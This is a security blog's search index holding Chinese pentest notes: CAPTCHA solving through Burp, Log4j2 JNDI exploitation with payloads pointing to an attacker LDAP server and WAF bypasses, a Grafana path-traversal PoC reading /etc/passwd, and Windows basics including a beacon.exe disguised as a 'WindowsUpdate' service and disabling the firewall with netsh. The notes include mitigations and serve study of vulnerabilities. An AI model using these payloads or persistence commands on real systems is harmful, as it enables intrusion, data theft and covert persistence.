<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>BurpSuite plugin captcha-killer for image CAPTCHA recognition (notes on the pitfalls)</title>
<link href="/article/bbde9c6d.html"/>
<url>/article/bbde9c6d.html</url>
<content type="html"><![CDATA[<h2 id="使用burp插件captcha-killer识别图片验证码"><a href="#使用burp插件captcha-killer识别图片验证码" class="headerlink" title="使用burp插件captcha-killer识别图片验证码"></a>Using the Burp plugin captcha-killer to recognize image CAPTCHAs</h2><h3 id="一、0x01插件简介"><a href="#一、0x01插件简介" class="headerlink" title="一、0x01插件简介"></a>1. 0x01 Plugin overview</h3><p>For Burp releases before 2020: <code>https://github.com/c0ny1/captcha-killer/tree/0.1.2</code></p><p>For Burp 2020: <code>https://github.com/Ta0ing/captcha-killer-java8</code></p><p>The problem captcha-killer solves is letting Burp make use of all kinds of CAPTCHA recognition techniques. The plugin currently targets image CAPTCHAs only; other CAPTCHA types are not supported. captcha-killer cannot recognize CAPTCHAs by itself; it focuses on calling the various CAPTCHA recognition APIs.<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211220104938772.png" alt="Plugin recognition screenshot"></p><h3 id="二、插件使用介绍"><a href="#二、插件使用介绍" class="headerlink" title="二、插件使用介绍"></a>2. Using the plugin</h3><h4 id="2-1-百度识别验证码接口:"><a href="#2-1-百度识别验证码接口:" class="headerlink" title="2.1 百度识别验证码接口:"></a>2.1 Baidu CAPTCHA recognition API:</h4><ul><li>Call Baidu OCR to recognize the CAPTCHA<br><code>https://cloud.baidu.com/product/ocr_general</code><br><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161712883-798203260.png"></li></ul><p>Create an application and record its API Key and Secret Key; they are used to obtain an Access Token. See <code>https://ai.baidu.com/ai-doc/REFERENCE/Ck3dwjhhu</code> for details.<br>How to obtain the access_token:</p><pre class="line-numbers language-none"><code class="language-none">curl -i -k 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id=【百度云应用的AK】&client_secret=【百度云应用的SK】'</code></pre><p><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161724768-746800088.png"></p><h4 id="2-使用插件captcha-killer自带的baiduocr模板"><a href="#2-使用插件captcha-killer自带的baiduocr模板" class="headerlink" title="2.使用插件captcha-killer自带的baiduocr模板"></a>2. Use the baiduocr template bundled with captcha-killer</h4><p><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161731781-417461223.png"></p><p>Change these two fields to your application's API endpoint and access_token<br><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161741299-1654241370.png"></p><p><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161748163-2022030841.png"></p><h4 id="2-2-图鉴识别验证码接口:"><a href="#2-2-图鉴识别验证码接口:" class="headerlink" title="2.2 图鉴识别验证码接口:"></a>2.2 图鉴 (ttshitu) CAPTCHA recognition API:</h4><p>API URL: <code>http://api.ttshitu.com:80</code></p><pre class="line-numbers language-none"><code class="language-none">POST /predict HTTP/1.1
Host: api.ttshitu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept: application/json;
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_d92eb5418ecf5150abbfe0e505020254=1585994993,1586144399; SESSION=5ebf9c31-a424-44f8-8188-62ca56de7bdf; Hm_lpvt_d92eb5418ecf5150abbfe0e505020254=1586****
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 109

{"username":"***","password":"******","typeid":"3","image":"<@BASE64><@IMG_RAW></@IMG_RAW></@BASE64>"}</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211220105257508.png" alt="Recognition demo"></p>]]></content>
<categories>
<category> Tips </category>
</categories>
<tags>
<tag> BurpSuite Script </tag>
</tags>
</entry>
<entry>
<title>Log4j2 Remote Code Execution Vulnerability</title>
<link href="/article/183cb454.html"/>
<url>/article/183cb454.html</url>
<content type="html"><![CDATA[<h2 id="Log4j2-远程代码执行漏洞"><a href="#Log4j2-远程代码执行漏洞" class="headerlink" title="Log4j2 远程代码执行漏洞"></a>Log4j2 Remote Code Execution Vulnerability</h2><h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>1. Vulnerability description</h3><h3 id="二、漏洞复现"><a href="#二、漏洞复现" class="headerlink" title="二、漏洞复现"></a>2. Vulnerability reproduction</h3><p><code>"app:"unifi-摄像头""</code></p><p><a href="https://codechina.csdn.net/mirrors/feihong-cs/JNDIExploit">https://codechina.csdn.net/mirrors/feihong-cs/JNDIExploit</a></p><pre class="line-numbers language-none"><code class="language-none">POST /api/2.0/login HTTP/1.1
Host: 127.167.200.245:7443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
cmd:whoami
Connection: close
Content-Type: application/json
Content-Length: 91

{"username":"${jndi:ldap://192.168.235.249:1389/Basic/TomcatEcho}", "password":"dasfdasfads"}</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211210204858902.png" alt="image-20211210204858902"></p><pre class="line-numbers language-none"><code class="language-none">${jndi:ldap://0107881c.dns.1433.eu.org/test}
JHtqbmRpOmxkYXA6Ly94eHguZG5zbG9nLmNuL3Rlc3R9
${${env:foo:-jndi}:dlap://127.0.0.1:1234/exp}
${jndi:dns://${sys:java.version}.dns.com}}</code></pre><p>Log4j Bypass WAF Payloads:</p><p>References:</p><pre class="line-numbers language-none"><code class="language-none">https://github.com/apache/logging-log4j2/pull/608/commits/755e2c9d57f0517a73d16bfcaed93cc91969bdee
https://mp.weixin.qq.com/s/wC7mrK1Y4DYz9_yW4fLzbw
https://mp.weixin.qq.com/s/K74c1pTG6m5rKFuKaIYmPg
https://mp.weixin.qq.com/s/jp_jBd9SN8pHy3jYc1rnTg
https://github.com/christophetd/log4shell-vulnerable-app</code></pre><p>Fix:<br>log4j2.formatMsgNoLookups=True<br>Emergency measures: first, block at the network level; second, prevent outbound connections; third, turn the feature off.</p><p><strong>1. Upgrade to the latest version:</strong></p><p>Contact the vendor for the fixed official release:</p><p><a href="https://github.com/apache/logging-log4j2">https://github.com/apache/logging-log4j2</a></p><p>The official fix has been found in the code but has not yet been formally released:</p><p><a href="https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1">https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1</a>, or use Qi An Xin (奇安信) product solutions to protect against this vulnerability.</p><p><strong>2. Mitigations:</strong></p><p>(1) JVM parameter -Dlog4j2.formatMsgNoLookups=true</p><p>(2) log4j2.formatMsgNoLookups=True</p><p>(3) Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true</p>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> Apache Log4j2 </tag>
</tags>
</entry>
<entry>
<title>Grafana Arbitrary File Read Vulnerability</title>
<link href="/article/76794d41.html"/>
<url>/article/76794d41.html</url>
<content type="html"><![CDATA[<h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>1. Vulnerability description</h3><p>Grafana is a cross-platform, open-source data visualization web application platform. Once a user has configured data sources to connect to, Grafana can display data charts and alerts in a web browser.</p><p>Grafana has an unauthenticated arbitrary file read vulnerability: an attacker can read arbitrary files on the host without any authentication.</p><p>Severity: High</p><p>The vulnerability stems from improper sanitization of the path parameter in the function that fetches public plugin assets. An attacker can exploit it by sending a crafted HTTP request containing the directory traversal sequence (../) to an affected device. An attacker who successfully exploits the vulnerability can view arbitrary files on the target device's file system.</p><h3 id="二、漏洞复现"><a href="#二、漏洞复现" class="headerlink" title="二、漏洞复现"></a>2. Vulnerability reproduction</h3><p>Quick check for presence: /public/plugins/a/a</p><p>A 400 or similar response means you need to take the middleware in front of Grafana into account</p><pre class="line-numbers language-none"><code class="language-none">GET /public/plugins/a/a HTTP/1.1
Host: Your Ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: zh-CN,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Pragma: no-cache
Cache-Control: no-cache</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207164607823.png" alt="Vulnerable instance"></p><h4 id="POC:"><a href="#POC:" class="headerlink" title="POC:"></a>POC:</h4><pre class="line-numbers language-none"><code class="language-none">GET /public/plugins/grafana-clock-panel/../../../../../../etc/passwd HTTP/1.1
Host: Your Ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207233920551.png" alt="Exploitation screenshot"></p><p><strong>Plugins installed by default</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/144999119-26b04c63-e8bc-49f6-9fc4-c05a8f41d585.png" alt="Plugins"></p><p><a href="https://github.com/jas502n/Grafana-VulnTips/blob/main/README.md">Grafana Unauthorized arbitrary file reading vulnerability</a></p><p><a href="https://github.com/Mr-xn/CVE-2021-43798">https://github.com/Mr-xn/CVE-2021-43798</a></p><p>RCE approach: read the database, which has a chance of yielding an AccessKey</p><p>EXPTools: <a href="https://github.com/A-D-Team/grafanaExp">https://github.com/A-D-Team/grafanaExp</a></p><p>References:</p><pre class="line-numbers language-none"><code class="language-none">https://vas.riskivy.com/vuln-detail?id=104
https://nosec.org/home/detail/4914.html</code></pre>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> Grafana </tag>
</tags>
</entry>
<entry>
<title>[Internal Network Pentesting] 01 Windows Basics Review</title>
<link href="/article/803abef8.html"/>
<url>/article/803abef8.html</url>
<content type="html"><![CDATA[<h2 id="内网学习-Windows基础回顾"><a href="#内网学习-Windows基础回顾" class="headerlink" title="内网学习-Windows基础回顾"></a>内网学习-Windows基础回顾</h2><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/496062add1d3223806b2504c321c051d.png" alt="拓扑"></p><h3 id="一、Tools:"><a href="#一、Tools:" class="headerlink" title="一、Tools:"></a>一、Tools:</h3><pre class="line-numbers language-none"><code class="language-none">掌握impacket工具包:使用--原理--编写 == 大成https://github.com/SecureAuthCorp/impacketdnspyHXDSoftEther VPNWindows Admin center 微软出品,用来远程管理电脑Autoruns 开机启动项管理工具课外阅读:https://cloud.tencent.com/developer/article/1769697<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="二、内网渗透理解"><a href="#二、内网渗透理解" class="headerlink" title="二、内网渗透理解"></a>二、内网渗透理解</h3><p>渗透测试本质是信息收集,内网对抗本身是对Windows的对抗。Linux较少</p><h3 id="三、Windows基础回顾"><a href="#三、Windows基础回顾" class="headerlink" title="三、Windows基础回顾"></a>三、Windows基础回顾</h3><h4 id="3-1-环境变量"><a href="#3-1-环境变量" class="headerlink" title="3.1 环境变量"></a>3.1 环境变量</h4><p>所有命令行其实都是二进制的可执行文件。如果cmd 是 <code>c:\Windows\system32\whoami.exe</code> 可以做个小实验,设置自己的exe到任意目录。</p><p>查看环境变量:<code>set</code></p><p>设置环境变量:<code>set tempname = uunicodesec</code></p><p>查询环境变量:<code>set | findstr r</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211126103615903.png" alt="环境变量"></p><h4 id="3-2-文件"><a href="#3-2-文件" class="headerlink" title="3.2 文件"></a>3.2 文件</h4><p><strong>3.2.1 Magic number</strong></p><p>即幻数,它可以用来标记文件或者协议的格式,很多文件都有幻数标志来表明该文件的格式。数头(Magic number)</p><ul><li>ZIP Archive(zip): 文件头 504B0304</li><li>RAR Archive(ara): 文件头 52617221</li><li>JPEG(jpg) 文件头 FFD8FF</li><li>PNG(png) 文件头 89504E47</li><li>GIF(gif) 文件头 47494638</li></ul><p><strong>3.2.2 PE 文件</strong></p><p>MZ头</p><p><strong>3.2.3 
文件时间</strong></p><ul><li>创建时间:是表示这个文件存在机器上的时间,当文件信息首次出现在当前硬盘上时</li><li>修改时间:这次更新的是对文件内容的单个更改,例如当您更改文件的内容并使用vim等工具保存它时,文件修改时间就会发生变化</li><li>访问时间:一旦文件的内容被读取,时间就会更新。例如在文件中使用较少的命令或请求较多的命令、</li></ul><p><strong>3.2.3 ACL</strong></p><p>ICACLS</p><pre class="line-numbers language-none"><code class="language-none">ICACLS name /save aclfile [/T] [/C] [/L] [/Q] 将匹配名称的文件和文件夹的 DACL 存储到 aclfile 中 以便将来与 /restore 一起使用。请注意,未保存 SACL、 所有者或完整性标签。ICACLS directory [/substitute SidOld SidNew [...]] /restore aclfile [/C] [/L] [/Q] 将存储的 DACL 应用于目录中的文件。ICACLS name /setowner user [/T] [/C] [/L] [/Q] 更改所有匹配名称的所有者。该选项不会强制更改所有 身份;使用 takeown.exe 实用程序可实现 该目的。ICACLS name /findsid Sid [/T] [/C] [/L] [/Q] 查找包含显式提及 SID 的 ACL 的 所有匹配名称。ICACLS name /verify [/T] [/C] [/L] [/Q] 查找其 ACL 不规范或长度与 ACE 计数不一致的所有文件。ICACLS name /reset [/T] [/C] [/L] [/Q] 为所有匹配文件使用默认继承的 ACL 替换 ACL。ICACLS name [/grant[:r] Sid:perm[...]] [/deny Sid:perm [...]] [/remove[:g|:d]] Sid[...]] [/T] [/C] [/L] [/Q] [/setintegritylevel Level:policy[...]] /grant[:r] Sid:perm 授予指定的用户访问权限。如果使用 :r, 这些权限将替换以前授予的所有显式权限。 如果不使用 :r,这些权限将添加到以前授予的 所有显式权限。 /deny Sid:perm 显式拒绝指定的用户访问权限。 将为列出的权限添加显式拒绝 ACE, 并删除所有显式授予的权限中的相同权限。 /remove[:[g|d]] Sid 删除 ACL 中所有出现的 SID。使用 :g,将删除授予该 SID 的所有权限。使用 :d,将删除拒绝该 SID 的所有权限。 /setintegritylevel [(CI)(OI)]级别将完整性 ACE 显式 添加到所有匹配文件。要指定的级别为以下级别 之一: L[ow] M[edium] H[igh] 完整性 ACE 的继承选项可以优先于级别,但只应用于 目录。 /inheritance:e|d|r e - 启用继承 d - 禁用继承并复制 ACE r - 删除所有继承的 ACE注意: Sid 可以采用数字格式或友好的名称格式。如果给定数字格式, 那么请在 SID 的开头添加一个 *。 /T 指示在以该名称指定的目录下的所有匹配文件/目录上 执行此操作。 /C 指示此操作将在所有文件错误上继续进行。 仍将显示错误消息。 /L 指示此操作在符号 链接本身而不是其目标上执行。 /Q 指示 icacls 应该禁止显示成功消息。 ICACLS 保留 ACE 项的规范顺序: 显式拒绝 显式授予 继承的拒绝 继承的授予 perm 是权限掩码,可以指定两种格式之一: 简单权限序列: N - 无访问权限 F - 完全访问权限 M - 修改权限 RX - 读取和执行权限 R - 只读权限 W - 只写权限 D - 删除权限 在括号中以逗号分隔的特定权限列表: DE - 删除 RC - 读取控制 WDAC - 写入 DAC WO - 写入所有者 S - 同步 AS - 访问系统安全性 MA - 允许的最大值 GR - 一般性读取 GW - 一般性写入 GE - 一般性执行 GA - 全为一般性 RD - 读取数据/列出目录 WD - 写入数据/添加文件 AD - 附加数据/添加子目录 REA - 读取扩展属性 WEA - 写入扩展属性 X - 执行/遍历 DC - 删除子项 RA - 读取属性 WA - 写入属性 
继承权限可以优先于每种格式,但只应用于 目录: (OI) - 对象继承 (CI) - 容器继承 (IO) - 仅继承 (NP) - 不传播继承 (I) - 从父容器继承的权限示例: icacls c:\windows\* /save AclFile /T - 将 c:\windows 及其子目录下所有文件的 ACL 保存到 AclFile。 icacls c:\windows\ /restore AclFile - 将还原 c:\windows 及其子目录下存在的 AclFile 内 所有文件的 ACL。 icacls file /grant Administrator:(D,WDAC) - 将授予用户对文件删除和写入 DAC 的管理员 权限。 icacls file /grant *S-1-1-0:(D,WDAC) - 将授予由 sid S-1-1-0 定义的用户对文件删除和 写入 DAC 的权限。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></s
pan><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211126110020640.png" alt="权限"></p><p><strong>3.2.3 Windows 目录结构</strong></p><p><strong>Users</strong>文件夹内包含着用户的一些信息和资料</p><p><strong>program files</strong></p><p>Program Files 指的是程序文件,也就是Windows 操作系统,也包括其它的操作系统各种软件默认安装到的目录。位于C盘分区(”C:\Program Files”,”%ProgramFiles%”)。</p><p><strong>AppData</strong></p><p> Appdata文件位于系统盘(一般是C盘)→用户→Default 目录下,里面还包含了Locallow、Local转、Loaming等文件夹,具体功能如下。</p><p>1、locallow:共享数据存放文件,一般都可以清理一些无用的共享文件。</p><p>2、Local:本地保存文件,其中本地临时文件,AppData\Local\Temp\下面的文件可以删除(注意是Temp)。</p><p>3、Roaming:保存应用程序运行后的数据信息,如果删除应用程序运行配置数据会丢失</p><p><strong>ProgramDate</strong></p><p>ProgramDate文件夹属于电脑 C盘的一个系统文件夹,它是公用的被创建文件夹或文件存放的地方,这些文件夹或文件仅由创建者完整控制。</p><h4 id="3-3-路由设置"><a href="#3-3-路由设置" class="headerlink" title="3.3 路由设置"></a>3.3 路由设置</h4><pre class="line-numbers language-none"><code class="language-none">tracert baidu.comroute printnetstat -rroute add 70.34.197.181 mask 255.255.255.255 192.168.103.1 route delete 192.168.0.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre><h4 id="Events"><a href="#Events" class="headerlink" title="Events"></a>Events</h4><p><a href="https://cloud.tencent.com/developer/article/1769697">安全蓝队 : windows日志检索和分析</a></p><h3 id="四、服务-Services)"><a href="#四、服务-Services)" class="headerlink" title="四、服务(Services)"></a>四、服务(<strong>Services</strong>)</h3><blockquote><p>Microsoft Windows 服务(过去称为 NT 服务)允许用户创建可在其自身的 Windows 会话中长时间运行的可执行应用程序。 这些服务可在计算机启动时自动启动,可以暂停和重启,并且不显示任何用户界面。 这些功能使服务非常适合在服务器上使用,或者需要长时间运行的功能(不会影响在同一台计算机上工作的其他用户)的情况。 还可以在与登录用户或默认计算机帐户不同的特定用户帐户的安全性上下文中运行服务。</p></blockquote><h4 id="4-1-服务生存周期"><a href="#4-1-服务生存周期" class="headerlink" title="4.1 
服务生存周期"></a>4.1 <strong>服务生存周期</strong></h4><p> 一项服务在其生存期内会经历几个内部状态。 首先,服务会安装到它将在其上运行的系统上。 此过程执行服务项目的安装程序,并将该服务加载到该计算机的服务控制管理器 中。 服务控制管理器是Windows 提供的用于管理服务的中央实用程序。</p><p> 必须在服务加载完成后启动它。 启动该服务以允许它开始运行。 可以从服务“服务控制管理器” 、“服务器资源管理器” ,或从通过调用 Start 方法的代码来启动服务。 Start 方法将处理进程传递给应用程序的OnStart 方法,并处理在那里定义的任何代码。</p><p> 正在运行的服务可以在此状态下无限期地存在,直到它停止或暂停,或者直到计算机关闭。 服务可以三种基本状态之一存在:<strong>Running</strong>、<strong>Paused</strong> 或 <strong>Stopped</strong>。 该服务还可以报告挂起命令的状态:ContinuePending、PausePending、StartPending 或 StopPending。 这些状态指示命令已发出(例</p><p>如,暂停正在运行的服务的命令),但尚未执行。 可以查询 Status 以确定服务所处的状态,或者在出现其中任一状态时使用 WaitForStatus 执行操作。</p><p> 可以从“服务控制管理器” 、“服务器资源管理器” ,或通过调用代码中的方法来暂停、停止或恢复服务。其中的每个操作都可以调用服务中的相关过程(OnStop、OnPause 或 OnContinue),可以在其中定义在服务更改状态时执行的其他处理进程。</p><p> <strong>4.1.1 services.msc</strong></p><p>在 Windows 中,打开 “服务”桌面应用程序。 按“Windows 徽标键+R”以打开“运行”框,然后输入<code>services.msc</code> 并按 Enter 或单击“确定” 。你会看到 “服务”中列出的服务按其设置的显示名称的字母顺序显示。</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207105006435.png" alt="服务"></p><p>每一行列出了服务的五个基本属性 (名称、描述、状态、启动类型、登录为)。其中我们比较关心的是服务的 <strong>状态</strong> 和 <strong>启动类型</strong>,状态有三种基本状态,分别是 <strong>Running</strong>、<strong>Paused</strong> 、 <strong>Stopped</strong>。启动类型则有如下四种类型 : <strong>手动</strong>、<strong>自动</strong>、<strong>自动</strong>(<strong>延迟启动</strong>)<strong>、禁用</strong>。</p><ul><li><p>手动 :服务只会在明确被调用的时候才会启动自动 :服务会在系统启动时启动</p></li><li><p>自动(延迟启动):服务会在系统启动一段时间后启动。此选项在 windows Vista 中引用,目的是</p></li><li><p>降低等待时间。</p></li><li><p>禁用 :服务被停用。</p></li></ul><p>通过 <strong>services.msc</strong> 可以轻松对服务的属性进行编辑。</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207105134387.png" alt="服务编辑"></p><p><strong>4.1.2 使用</strong> <strong>SC</strong> <strong>控制服务</strong></p><pre class="line-numbers language-txt" data-language="txt"><code class="language-txt">描述: SC 是用来与服务控制管理器和服务进行通信 的命令行程序。用法: sc <server> [command] [service name] <option1> <option2>... 
<server> 选项的格式为 "\\ServerName" 可通过键入以下命令获取有关命令的更多帮助: "sc [command]" 命令: query-----------查询服务的状态, 或枚举服务类型的状态。 queryex---------查询服务的扩展状态, 或枚举服务类型的状态。 start-----------启动服务。 pause-----------向服务发送 PAUSE 控制请求。 interrogate-----向服务发送 INTERROGATE 控制请求。 continue--------向服务发送 CONTINUE 控制请求。 stop------------向服务发送 STOP 请求。 config----------更改服务的配置(永久)。 description-----更改服务的描述。 failure---------更改失败时服务执行的操作。 failureflag-----更改服务的失败操作标志。 sidtype---------更改服务的服务 SID 类型。 privs-----------更改服务的所需特权。 managedaccount--更改服务以将服务帐户密码 标记为由 LSA 管理。 qc--------------查询服务的配置信息。 qdescription----查询服务的描述。 qfailure--------查询失败时服务执行的操作。 qfailureflag----查询服务的失败操作标志。 qsidtype--------查询服务的服务 SID 类型。 qprivs----------查询服务的所需特权。 qtriggerinfo----查询服务的触发器参数。 qpreferrednode--查询服务的首选 NUMA 节点。 qmanagedaccount-查询服务是否将帐户 与 LSA 管理的密码结合使用。 qprotection-----查询服务的进程保护级别。 quserservice----查询用户服务模板的本地实例。 delete ----------(从注册表中)删除服务。 create----------创建服务(并将其添加到注册表中)。 control---------向服务发送控制。 sdshow----------显示服务的安全描述符。 sdset-----------设置服务的安全描述符。 showsid---------显示与任意名称对应的服务 SID 字符串。 triggerinfo-----配置服务的触发器参数。 preferrednode---设置服务的首选 NUMA 节点。 GetDisplayName--获取服务的 DisplayName。 GetKeyName------获取服务的 ServiceKeyName。 EnumDepend------枚举服务依赖关系。 以下命令不需要服务名称: sc <server> <command> <option> boot------------(ok | bad)指示是否应将上一次启动另存为 最近一次已知的正确启动配置 Lock------------锁定服务数据库 QueryLock-------查询 SCManager 数据库的 LockStatus示例: sc start MyServiceQUERY 和 QUERYEX 选项: 如果查询命令带服务名称,将返回 该服务的状态。其他选项不适合这种 情况。如果查询命令不带参数或 带下列选项之一,将枚举此服务。 type= 要枚举的服务的类型(driver, service, userservice, all) (默认 = service) state= 要枚举的服务的状态 (inactive, all) (默认 = active) bufsize= 枚举缓冲区的大小(以字节计) (默认 = 4096) ri= 开始枚举的恢复索引号 (默认 = 0) group= 要枚举的服务组 (默认 = all groups)语法示例sc query - 枚举活动服务和驱动程序的状态sc query eventlog - 显示 eventlog 服务的状态sc queryex eventlog - 显示 eventlog 服务的扩展状态sc query type= driver - 仅枚举活动驱动程序sc query type= service - 仅枚举 Win32 服务sc query state= all - 枚举所有服务和驱动程序sc query bufsize= 50 - 枚举缓冲区为 50 字节sc query ri= 14 - 枚举时恢复索引 = 14sc queryex group= "" - 枚举不在组内的活动服务sc query 
type= interact - 枚举所有不活动服务
sc query type= driver group= NDIS - 枚举所有 NDIS 驱动程序</code></pre><p><strong>Commonly used sc commands</strong></p><pre class="line-numbers language-none"><code class="language-none">sc \\ServerName query spooler    // query the status of a service on a remote machine
sc qc spooler                    // query the service's configuration
sc stop spooler                  // stop the specified service
sc start spooler                 // start the specified service
sc query | findstr Manager       // find all services whose name contains "Manager"
sc delete <ServiceName>          // delete the specified service
sc create WindowsUpdate binPath="cmd /K C:\windows\beacon.exe" DisplayName="WindowsUpdate"    // create a service named WindowsUpdate
sc create WindowsUpdate binPath="cmd /k C:\windows\beacon.exe" DisplayName="WindowsUpdate" start=auto    // create a service named WindowsUpdate and set it to start automatically
sc sdshow spooler                // show the service's security descriptor</code></pre><h3 id="五、Firewall"><a href="#五、Firewall" class="headerlink" title="五、Firewall"></a>5. Firewall</h3><blockquote><p>Windows Firewall (officially called Windows Defender Firewall in Windows 10) is the firewall component of Microsoft Windows. It was first included in Windows XP and Windows Server 2003. Before the release of Windows XP Service Pack 2 in 2004 it was called Internet Connection Firewall. With the release of Windows 10 version 1709 in September 2017 it was renamed Windows Defender Firewall.</p></blockquote><p><strong>5.1 Windows Firewall</strong></p><p>Windows Defender Firewall with Advanced Security provides host-based, two-way filtering of network traffic and blocks unauthorized traffic flowing into or out of the local device.</p><p>The Windows default rule set blocks inbound connections and allows outbound connections. In other words, every program or port that must accept inbound connections needs an inbound rule configured on the firewall; otherwise the connection is blocked.</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207110647693.png" alt="Firewall"></p><p>Differences between the three profiles:</p><table><thead><tr><th>Profile</th><th>When it applies</th></tr></thead><tbody><tr><td>Domain</td><td>Applied to a network adapter when it is connected to a network on which a domain controller for the domain the computer is joined to can be detected.</td></tr><tr><td>Private</td><td>A network at home or at work where you trust the people and devices on the network. When Private is selected, network discovery is turned on but file and printer sharing is turned off. Private profile settings should be more restrictive than domain profile settings.</td></tr><tr><td>Public</td><td>A network in a public place. This location prevents other computers from seeing this computer. When Public is the selected network location, network discovery and file and printer sharing are turned off. Because the computer is connected to a public network whose security cannot be controlled, the public profile settings should be the most restrictive.</td></tr></tbody></table><p>Settings that can be configured per profile:</p><ul><li><p><strong>Firewall state.</strong> You can turn the firewall on or off for each profile independently.</p></li><li><p><strong>Inbound connections.</strong> You can block connections that do not match any active firewall rule (the default), block all connections regardless of the inbound rules, or allow inbound connections that do not match an active firewall rule.</p></li><li><p><strong>Outbound connections.</strong> You can allow connections that do not match any active firewall rule (the default) or block outbound connections that do not match an active firewall rule.</p></li><li><p><strong>Protected network connections.</strong> You can select the connections (for example, Local Area Connection) that you want Windows Firewall to help protect. You can configure display notifications and unicast responses, as well as the merging of rules distributed through Group Policy. You can configure and enable logging.</p></li><li><p><strong>IPsec settings.</strong> You can configure defaults for the IPsec configuration. IPsec:</p><ul><li><p>provides mutual authentication before and during communication;</p></li><li><p>forces both parties to identify themselves during communication;</p></li><li><p>provides confidentiality through IP traffic encryption and digital packet authentication.</p></li></ul></li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207111119412.png" alt="IPsec"></p><p><strong>WF.msc</strong></p><p>Open Control Panel and type "Allow an app or feature through Windows Defender Firewall"; you will see "Windows Defender Firewall with Advanced Security". Alternatively, press Windows logo key + R to open the Run box, type <code>WF.msc</code> and press <code>Enter</code> or click OK.</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207111225819.png" alt="Rules"></p><p>The console has four lists: Inbound Rules, Outbound Rules, Connection Security Rules and Monitoring.</p><ul><li><p>Inbound rules: rules triggered when other network devices or machines access this machine.</p></li><li><p>Outbound rules: rules triggered when this machine accesses other network devices or machines.</p></li></ul><p><strong>Using netsh during a penetration test</strong></p><ul><li>Modifying the firewall configuration (not intercepted by 360)</li></ul><pre class="line-numbers language-none"><code class="language-none">1. Turn the firewall on
netsh advfirewall set allprofiles state on
2. Turn the firewall off
netsh advfirewall set allprofiles state off
3. Restore the firewall's default settings
netsh advfirewall reset
4. Add an inbound Remote Desktop rule allowing port 3389
netsh advfirewall firewall add rule name=远程桌面(TCP-In-3389) protocol=TCP dir=in localport=3389 action=allow
5. Delete a rule (a specific firewall rule can be deleted by name)
netsh advfirewall firewall delete rule name=远程桌面(TCP-In-3389)
6. Export the firewall configuration to a file
netsh advfirewall export c:\xxx.pol
7. Import a firewall configuration file into the system
